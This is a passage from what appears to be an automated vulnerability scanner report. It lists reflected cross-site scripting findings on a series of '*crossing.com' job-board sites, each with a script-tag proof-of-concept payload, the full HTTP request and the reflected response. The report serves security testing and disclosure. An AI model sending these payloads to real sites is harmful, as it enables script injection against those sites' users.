Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:38:19 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:38:19 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:38:19 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 108746

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.planningcrossing.com/?131dd"><script>alert(1)</script>32e79ab8991=1">
...[SNIP]...

3.97. http://www.postdoctoralfellowcrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.postdoctoralfellowcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26245"><script>alert(1)</script>d6a7726482b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?26245"><script>alert(1)</script>d6a7726482b=1 HTTP/1.1
Host: www.postdoctoralfellowcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:38:44 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=qpc1ersq5h9qncti1rg1u4rc74; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:38:44 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:38:44 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:38:44 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:38:44 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:38:44 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:38:44 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:38:44 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:38:44 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 102797

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.postdoctoralfellowcrossing.com/?26245"><script>alert(1)</script>d6a7726482b=1">
...[SNIP]...

3.98. http://www.prcrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18964"><script>alert(1)</script>b19a0aa290b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?18964"><script>alert(1)</script>b19a0aa290b=1 HTTP/1.1
Host: www.prcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:24:41 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=6orf3teb9u7v31k70a8nmlrc21; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:24:41 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:24:41 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:24:41 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:24:41 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:24:41 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:24:41 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:24:41 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:24:41 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 120233

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.prcrossing.com/?18964"><script>alert(1)</script>b19a0aa290b=1">
...[SNIP]...

3.99. http://www.procurementcrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.procurementcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e82f"><script>alert(1)</script>c07e8b35600 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?4e82f"><script>alert(1)</script>c07e8b35600=1 HTTP/1.1
Host: www.procurementcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:22:45 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=jse3n83urq36atc979iv0ro2j3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:22:45 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:22:45 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:22:45 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:22:45 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:22:45 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:22:45 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:22:45 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:22:45 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 101054

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.procurementcrossing.com/?4e82f"><script>alert(1)</script>c07e8b35600=1">
...[SNIP]...

3.100. http://www.productmanagercrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.productmanagercrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 103c3"><script>alert(1)</script>96ed62da7e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?103c3"><script>alert(1)</script>96ed62da7e5=1 HTTP/1.1
Host: www.productmanagercrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:54 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=6b3lghgc54sic7k9tq5ivitvo7; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:54 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:54 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:54 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:54 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:54 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:54 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:54 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:54 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 106239

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.productmanagercrossing.com/?103c3"><script>alert(1)</script>96ed62da7e5=1">
...[SNIP]...

3.101. http://www.projectmanagementcrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.projectmanagementcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3757"><script>alert(1)</script>8ec40ce5596 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?f3757"><script>alert(1)</script>8ec40ce5596=1 HTTP/1.1
Host: www.projectmanagementcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:43:26 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=07nflqvoiopran8iob1ldegr20; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:43:27 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:43:27 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:43:27 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:43:27 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:43:27 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:43:27 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:43:27 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:43:27 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 119192

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.projectmanagementcrossing.com/?f3757"><script>alert(1)</script>8ec40ce5596=1">
...[SNIP]...

3.102. http://www.publicinterestcrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.publicinterestcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 446c3"><script>alert(1)</script>0be37d14be6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?446c3"><script>alert(1)</script>0be37d14be6=1 HTTP/1.1
Host: www.publicinterestcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:40 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=tto0bf5j0sbrt1q0tufjnj4kr7; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:40 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:40 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:40 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:40 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:40 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:40 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:40 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:40 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 104377

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.publicinterestcrossing.com/?446c3"><script>alert(1)</script>0be37d14be6=1">
...[SNIP]...

3.103. http://www.publishingcrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.publishingcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1299"><script>alert(1)</script>63d6d679443 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?d1299"><script>alert(1)</script>63d6d679443=1 HTTP/1.1
Host: www.publishingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:28 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=aiscpmnekeoaiek7jnvn73dp42; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:28 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:28 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:28 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:28 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:28 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:28 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:28 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:28 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 114371

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.publishingcrossing.com/?d1299"><script>alert(1)</script>63d6d679443=1">
...[SNIP]...

3.104. http://www.purchasingcrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.purchasingcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d28bb"><script>alert(1)</script>b81fd1e5072 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?d28bb"><script>alert(1)</script>b81fd1e5072=1 HTTP/1.1
Host: www.purchasingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:17 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=gmq6hirbm9eue9jjuuskphbjn7; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:17 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:17 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:17 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:17 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:17 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:17 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:17 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:17 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 105527

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.purchasingcrossing.com/?d28bb"><script>alert(1)</script>b81fd1e5072=1">
...[SNIP]...

3.105. http://www.qaqccrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.qaqccrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29083"><script>alert(1)</script>3b93251e4b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?29083"><script>alert(1)</script>3b93251e4b2=1 HTTP/1.1
Host: www.qaqccrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:26:02 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=vsmun0sght8cf4achncb8ubfe5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:26:02 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:26:02 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:26:02 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:26:02 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:26:02 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:26:02 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:26:02 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:26:02 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 120308

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.qaqccrossing.com/?29083"><script>alert(1)</script>3b93251e4b2=1">
...[SNIP]...

3.106. http://www.radiocrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.radiocrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6983f"><script>alert(1)</script>7619a9d5f08 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?6983f"><script>alert(1)</script>7619a9d5f08=1 HTTP/1.1
Host: www.radiocrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:39:21 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=a94a3oatt4kmsoc6ijm0m7a5n1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:39:21 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:39:21 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:39:21 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:39:21 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:39:21 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:39:21 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:39:21 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:39:21 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 113039

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.radiocrossing.com/?6983f"><script>alert(1)</script>7619a9d5f08=1">
...[SNIP]...

3.107. http://www.realestateandlandcrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.realestateandlandcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef9e9"><script>alert(1)</script>126cfe4dd1e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?ef9e9"><script>alert(1)</script>126cfe4dd1e=1 HTTP/1.1
Host: www.realestateandlandcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:43:06 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=bsc5erjjrsq5ueq9uqc5ru32g7; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:43:06 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:43:06 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:43:06 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:43:06 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:43:06 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:43:06 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:43:06 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:43:06 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 133027

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.realestateandlandcrossing.com/?ef9e9"><script>alert(1)</script>126cfe4dd1e=1">
...[SNIP]...

3.108. http://www.recruitingcrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.recruitingcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16149"><script>alert(1)</script>16bf2ef67b6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?16149"><script>alert(1)</script>16bf2ef67b6=1 HTTP/1.1
Host: www.recruitingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:32 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=492145tgm4g6mf4vc155mn93e3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:32 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:32 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:32 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:32 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:32 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:32 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:32 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:32 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 105635

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.recruitingcrossing.com/?16149"><script>alert(1)</script>16bf2ef67b6=1">
...[SNIP]...

3.109. http://www.researchingcrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.researchingcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5ee5"><script>alert(1)</script>4bed916ba21 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?c5ee5"><script>alert(1)</script>4bed916ba21=1 HTTP/1.1
Host: www.researchingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:49 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=divi8ktvms9d45k1rajt78o7o3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:49 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:49 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:49 GMT
